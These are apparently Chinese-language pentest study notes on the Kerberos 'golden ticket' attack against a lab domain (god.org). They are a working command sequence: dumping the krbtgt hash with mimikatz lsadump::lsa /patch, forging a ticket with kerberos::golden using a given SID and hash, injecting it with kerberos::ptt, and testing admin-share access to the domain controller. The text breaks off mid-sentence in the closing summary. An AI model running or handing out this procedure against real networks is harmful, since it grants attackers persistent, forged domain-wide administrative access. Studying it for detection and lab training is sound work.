黄金票据
条件:
1、已经拿下域管理员,获取到krbtgt hash;域控SID值-500
2、利用krbtgt的hash制作黄金票据工具,进行攻击。
流程:
1、域名:god.org(ipconfig -all #获取域名)
2、域的SID值:S-1-5-21-1218902331-2157346161-1782232778
获取SID命令:
>whoami /user
>whoami /all
>wmic useraccount get name,sid #获取SID(选500结尾的)
获取krbtgt的HASH
>mimikatz privilege::debug
>mimikatz lsadump::lsa /patch #获取krbtgt的ntlmhash
4、伪造用户名:webadmin(任意用户名)
god.org(当前域名)
webadmin(当前用户)
生成票据:
mimikatz kerberos::golden /user:webadmin /domain:god.org /sid:S-1-5-21-1218902331-2157346161-1782232778 /krbtgt:b097d7ed97495408e1537f706c357fc5 /ticket:gf
导入内存:
mimikatz kerberos::ptt gf
访问测试:
dir \\owa2010cn-god\c$
黄金票据总结:
该攻击⽅式其实是⼀种后⻔的形式,属于第⼆